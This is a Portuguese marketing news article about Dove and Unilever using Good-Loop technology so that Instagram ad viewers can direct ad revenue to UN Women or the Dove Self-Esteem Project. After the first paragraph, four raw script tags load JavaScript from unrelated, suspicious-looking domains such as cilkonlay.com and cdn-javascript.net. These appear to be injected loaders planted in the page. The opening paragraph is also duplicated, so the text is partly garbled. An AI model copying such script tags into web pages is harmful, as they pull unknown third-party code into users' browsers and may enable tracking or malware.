Experiência de Marca

Dove transforma anúncio em ação social

Definido pela empresa como “propagandas éticas”, a manobra continua uma onda começada pela própria no YouTube, que usava a mesma tática com os anúncios veiculados antes dos vídeos da plataforma. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573408262766" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Ação é fruto de parceria da Unilever com tecnologia da Good-Loop, que garante dobro de engajamento nas redes sociais a anunciantes que aderirem à ferramenta.

A Unilever começou a veicular na última semana uma série de anúncios de Instagram que permite aos usuários redirecionar a grana ganha pela companhia com a divulgação a uma instituição de caridade de sua escolha.

O melhor do marketing social está aqui.

Leia também: Dove coloca no ar Voltando a Aprender.

Definido pela empresa como “propagandas éticas”, a manobra continua uma onda começada pela própria no YouTube, que usava a mesma tática com os anúncios veiculados antes dos vídeos da plataforma.

Embora o The Drum reporte que testes tenham sido conduzidos com as subsidiárias Knorr e Lynx em sites tradicionais, a Unilever declara que o seu primeiro grande experimento com a tecnologia será com a Dove na rede social de fotos do Facebook.

Criado pela Good-Loop, a ferramenta será ativada toda vez que o usuário chegar ao fim do anúncio, mostrando um link que, quando deslizado para cima no smartphone, automaticamente redirecionará o dinheiro ganho com a atenção da pessoa para uma de duas instituições de caridade escolhidas pela companhia – no caso a UN Women, das Nações Unidas, ou a Dove Self-Esteem Project desenvolvida pelo próprio conglomerado.

“A extensão da parceria da Unilever com o ambiente do Instagram é extremamente excitante, em especial porque é prova da nossa habilidade de conectar donações para a caridade com publicidade digital em grande escala.”, declara a cofundadora e CEO da Good-Loop Amy Williams sobre o projeto.

A empresa também garante uma taxa de sucesso alta, afirmando que anunciantes que usam a tecnologia veem o engajamento praticamente dobrar nas redes sociais.

No caso da Dove, a ação se dará nos conformes da nova campanha da marca, que busca espalhar a mensagem de que não existe padrões quando se trata do visual das axilas.